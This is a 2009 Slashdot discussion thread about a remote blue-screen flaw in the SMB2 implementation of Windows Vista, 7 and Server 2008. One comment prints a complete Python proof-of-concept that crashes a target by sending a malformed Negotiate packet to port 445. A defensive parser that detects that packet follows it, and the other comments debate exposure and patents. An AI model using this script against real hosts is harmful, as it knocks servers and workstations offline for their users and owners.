Microsoft Security

Windows 7 Reintroduces Remote BSoD 427

David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy of the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."
  • Re:Pretty nice (Score:2, Informative)

    by David Gerard ( 12369 ) <slashdot AT davidgerard DOT co DOT uk> on Tuesday September 08, 2009 @10:08AM (#29350725) Homepage
    This is in the RTM gold master.
  • Correction! (Score:5, Informative)

    by David Gerard ( 12369 ) <slashdot AT davidgerard DOT co DOT uk> on Tuesday September 08, 2009 @10:10AM (#29350741) Homepage

    I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.

    And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.

  • Re:Correction! (Score:4, Informative)

    by Anonymous Coward on Tuesday September 08, 2009 @10:17AM (#29350811)
    And not exploitable out of the box since SMB and SMBv2 are both firewalled. Yes, if you turn on homegroup, you are opening SMBv2 through the firewall, but only for the private network - so the exploit would need to be coming from another machine at your house. All in all, a nasty issue but won't really affect that many people.
  • by Seth Kriticos ( 1227934 ) on Tuesday September 08, 2009 @10:25AM (#29350917)
    Vulnerable systems are all those with SMB2 drivers: Vista, W7 and probably Server 2008

    The exploit (which is actually ridiculously simple) goes as follows:

    #!/usr/bin/python
    # When SMB 2.0 receives a "&" char in the "Process Id High" SMB header field it dies with a
    # PAGE_FAULT_IN_NONPAGED_AREA
    from socket import socket
    from time import sleep

    host = "IP_ADDR", 445
    buff = (
    "\x00\x00\x00\x90" # Begin SMB header: Session message
    "\xff\x53\x4d\x42" # Server Component: SMB
    "\x72\x00\x00\x00" # Negotiate Protocol
    "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
    "\x00\x26"         # Process ID High: --> :) normal value should be "\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    "\x30\x30\x32\x00"
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()

    Current problem solution: disable the SMB protocol on your infrastructure.

    Now please excuse me, I have to go and play a bit with our network admin.. /joke
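    Added here as a defender's example, not part of the commenter's script: a small Python parser that decodes the NetBIOS session header and the 32-byte SMB1 header of a message and flags a Negotiate request whose Process ID High field is non-zero, which is the condition the script above relies on. The two sample headers are constructed for this example (header only, no dialect body); the field layout follows the SMB1 header as documented in MS-CIFS.

```python
import struct

# SMB1 header constants (MS-CIFS layout); Negotiate = 0x72 as in the script above.
SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
NETBIOS_HDR_LEN = 4
SMB1_HDR_LEN = 32


def parse_smb1_header(msg: bytes) -> dict:
    """Decode the NetBIOS session header plus the 32-byte SMB1 header."""
    if len(msg) < NETBIOS_HDR_LEN + SMB1_HDR_LEN:
        raise ValueError("message too short for NetBIOS + SMB1 header")
    nb_len = int.from_bytes(msg[1:4], "big")  # NetBIOS length is big-endian
    hdr = msg[NETBIOS_HDR_LEN:NETBIOS_HDR_LEN + SMB1_HDR_LEN]
    if hdr[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB1 message")
    # Fields after the magic are little-endian: Command, Status, Flags, Flags2,
    # PIDHigh, SecurityFeatures(8), Reserved, TID, PIDLow, UID, MID
    (command, status, flags, flags2, pid_high, _sig,
     _reserved, tid, pid_low, uid, mid) = struct.unpack("<BIBHH8sHHHHH", hdr[4:])
    return {"nb_len": nb_len, "command": command, "status": status,
            "flags": flags, "flags2": flags2, "pid_high": pid_high,
            "tid": tid, "pid_low": pid_low, "uid": uid, "mid": mid}


def is_suspicious_negotiate(msg: bytes) -> bool:
    """True for a Negotiate request carrying a non-zero Process ID High."""
    h = parse_smb1_header(msg)
    return h["command"] == SMB_COM_NEGOTIATE and h["pid_high"] != 0


def _negotiate_header(pid_high: bytes) -> bytes:
    """Constructed sample: NetBIOS header + SMB1 Negotiate header only."""
    return (b"\x00\x00\x00\x20"           # NetBIOS session message, length 32
            + SMB1_MAGIC
            + b"\x72"                     # Command: Negotiate
            + b"\x00\x00\x00\x00"         # Status
            + b"\x18" + b"\x53\xc8"       # Flags, Flags2
            + pid_high                    # Process ID High
            + b"\x00" * 8                 # SecurityFeatures
            + b"\x00\x00"                 # Reserved
            + b"\xff\xff" + b"\xff\xfe"   # TID, PID low
            + b"\x00\x00" + b"\x00\x00")  # UID, MID


BENIGN = _negotiate_header(b"\x00\x00")     # normal client value
MALFORMED = _negotiate_header(b"\x00\x26")  # the "&" the script above sends

if __name__ == "__main__":
    print([is_suspicious_negotiate(p) for p in (BENIGN, MALFORMED)])  # [False, True]
```

    A network sensor that sees SMB traffic on TCP 445 could run the same check on each session's first message and raise an alert rather than forward it.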
  • by AndrewNeo ( 979708 ) on Tuesday September 08, 2009 @10:25AM (#29350923) Homepage

    No, it won't. The specs are right here [microsoft.com].

  • Re:Local? (Score:2, Informative)

    by jim_v2000 ( 818799 ) on Tuesday September 08, 2009 @10:26AM (#29350929)
    Pft...it'll be patched whenever the next update cycle is and will be irrelevant. Yeah, it's bad, but it will be short lived.
  • by leromarinvit ( 1462031 ) on Tuesday September 08, 2009 @10:36AM (#29351055)

    Probably not technical problems, but maybe legal ones. See that paragraph about patents? Neither the Open Specification Promise nor the Community Promise (both linked) cover SMB2.

  • by eldavojohn ( 898314 ) * <eldavojohn@noSpAM.gmail.com> on Tuesday September 08, 2009 @10:38AM (#29351097) Journal

    No, it won't. The specs are right here [microsoft.com].

    "No, it won't" what? Possibly spell problems for the Samba team? From your link:

    Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp [microsoft.com]) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx [microsoft.com]). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com ...

    Emphasis mine. So I'll correct myself, it may spell trouble for the Samba team. It's not clear. Which is essentially what I said. Do you really think iplg@microsoft.com will grant the Samba team a written license or possibly a patent license?

    Why do they use the ambiguous language quoted above if this is an open technology I'm not supposed to fear implementing? I mean, haven't we been threatened over this sort of thing before [slashdot.org]? It's not clear to me why Microsoft stops other products from interfacing with theirs (product lock-in?) but I'm not about to give them the benefit of the doubt.

  • Re:Woo! (Score:3, Informative)

    by Sethb ( 9355 ) <bokelman@outlook.com> on Tuesday September 08, 2009 @10:42AM (#29351187)
    I love it when Slashdot can't post an accurate headline. This is a flaw in SMB 2.0, which is present in Windows Vista, Windows Server 2008, Windows 7, and probably Windows Server 2008 R2 as well. This is not new to 7, it's a common flaw in all the implementations of SMB 2.0. XP isn't affected because XP can't speak that protocol.
  • Re:Not consistent (Score:5, Informative)

    by Lulfas ( 1140109 ) on Tuesday September 08, 2009 @10:45AM (#29351219)
    It's because SMB and SMBv2 are firewalled straight out of the box. You have to turn on homegroup and then attempt to exploit. Not quite the "OMG SKY IS FALLING" that the summary leads us to believe.
  • by Anonymous Coward on Tuesday September 08, 2009 @10:45AM (#29351229)

    Yes, use Windows because none of that ever happens. [electronista.com]

    Great strawman argument, btw. We should ignore vulnerabilities in microsoft software because some precious flowers don't want their sensibilities offended.

  • by Krneki ( 1192201 ) on Tuesday September 08, 2009 @10:49AM (#29351287)
    Trolls are OS independent. :)
  • by Anonymous Coward on Tuesday September 08, 2009 @10:54AM (#29351363)

    Dear User. It's a shame you cannot join linux community. We will be missing you and your valuable posts including:

    1) Your thoughts on what should be fixed in 'linux'

    2) Numerous (yet not very useful) descriptions of problems you encountered with 'linux' and demands to fix them

    3) Comparing 'linux' to windows every time a new ubuntu or windows release is out

    4) Screenshots of your desktop & stories about your friends seeing you use 'linux'

  • Re:Local? (Score:5, Informative)

    by afidel ( 530433 ) on Tuesday September 08, 2009 @11:02AM (#29351463)
    What about the employee who just got fired who sets off an IP walk that crashes every file server? What about the employee that gets the malware of the day and it includes the ability for the 0wner to launch this attack inside your LAN? There's a lot more potential for abuse than just the prankster on the helpdesk deciding he wants to create some havoc.
  • Comment removed (Score:5, Informative)

    by account_deleted ( 4530225 ) on Tuesday September 08, 2009 @11:03AM (#29351475)
    Comment removed based on user account deletion
  • Re:Local? (Score:3, Informative)

    by bbernard ( 930130 ) on Tuesday September 08, 2009 @11:23AM (#29351811)

    "but generally speaking you're not expecting attacks from inside your LAN"

    Right, because a virus on my local network would never take advantage of that.
    Right, because more than 60% of data loss events are triggered by insiders.
    Right, because you personally know and trust every user on your LAN.
    Right, because nobody would connect an unapproved device, like their iPod, or personal PC, to the LAN.

    If you're not expecting most of your attacks from inside your LAN then you're just fooling yourself.

  • Re:Local? (Score:1, Informative)

    by damien_kane ( 519267 ) on Tuesday September 08, 2009 @11:50AM (#29352223)

    You know, some of us work at multi-national corporations/firms that have offices in other countries. Should someone have access to the network by some means, they could crash a company's machines from halfway around the world since they are all on the same LAN...

    What did it cost you to run cables 50,000 miles between your offices, and how did you get over the latency? Further to that, isn't your IT/Info-Sec group afraid of someone putting a listener on those cables?
    Any place I know of with remote/satellite offices (including my own) uses WAN or VPN, where (due to separate subnets and proper routing) one member-LAN can't take down the other member-LAN halfway across the world with a simple ping-flood, netbios, or SMB attack.
    Most modern offices these days even go so far as having each floor, or even department, on different physical networks, separate from each other.

  • by Abreu ( 173023 ) on Tuesday September 08, 2009 @11:51AM (#29352251)

    I'll bite.

    Theologically speaking, it's not to avoid "Allah feeling threatened and insecure".

    The rug maker is just insuring himself that he won't fall to pride and hubris.

  • by miffo.swe ( 547642 ) <daniel@hedblom.gmail@com> on Tuesday September 08, 2009 @12:21PM (#29352703) Homepage Journal

    My coworker and I tried this on an updated Windows 2008 today and neither of us could believe what happened. The server just dies mid-air and throws a proud BSOD.

    Am I the only one surprised something like this could slip through all the supposed testing done by Microsoft? Have they even run a fuzzer against their code at all? If blatantly obvious holes like this go unseen in the new TCP/IP SMB2 code, rest assured a whole slew of new holes will be found later.

    Funniest thing is that this doesn't affect XP while Microsoft touts Windows 7/2008 as the safest OS ever. I guess it's all marketing and just blatantly nothing done about security other than to blame everything on the user by passing every security decision onto the user with UAC.

  • Re:Local? (Score:3, Informative)

    by Midnight Thunder ( 17205 ) on Tuesday September 08, 2009 @01:38PM (#29353881) Homepage Journal

    If it works with IPv6 then a malicious site can have an IPv6 address. When the user visits the site the code reads the source IP and implements the attack.

    This is why in a properly configured network you can limit SMB to within your network, by use of a firewall. With IPv6 a firewall is pretty much mandatory. If you need to file share outside your network, then using something like webdav in HTTPS mode is probably better, since this helps make it clear that you are not within your network.

    Actually thinking about it, it would be cool if there was a way to change the icon of the server to indicate that it is outside your network (based on the subnet mask or something of the sorts).

  • Idiot (Score:4, Informative)

    by omb ( 759389 ) on Tuesday September 08, 2009 @03:13PM (#29355241)
    Of course it is _VERY_SERIOUS_, unprivileged user-land electively crashes the kernel of every machine it can route TCP packets to, WTF are you stupid or something?
  • Re:Local? (Score:3, Informative)

    by RiotingPacifist ( 1228016 ) on Tuesday September 08, 2009 @03:31PM (#29355465)

    I can see it being used multiple times to dereference multiple kernel pointers, but I can't see how you would get it to execute code. I suppose it's a question of how much damage you can do dereferencing stuff inside the kernel vs how much protection NT has against this stuff.
    On Linux a few well placed dereferences and you could probably disable the firewall then run anything as effective root (by removing all security checks), ofc to do damage you would still need a second exploit on an already running process (including those that were protected) to make use of this.

  • by WillHill ( 1633827 ) on Tuesday September 08, 2009 @06:36PM (#29358633)
    What's wrong Twitter? All of your accounts in karma hell? BTW, your suicide comment you made only shows your stupidity.
  • by ajlisows ( 768780 ) on Tuesday September 08, 2009 @11:28PM (#29361455)

    I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.

    I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.

    I do agree with a lot of things that you said, except for the main point. If you are truly the mature adult here you should be able to use the best tool for the job even if others who use it act like complete idiots. Most of the people you speak of aren't the ones doing hard core Linux development. There are some very brilliant, mature, and overall decent individuals in the Open Source Community. Heck if you really want to help, bring your Software Engineering skills and your open mindedness to the community. You'll help it grow in two ways!
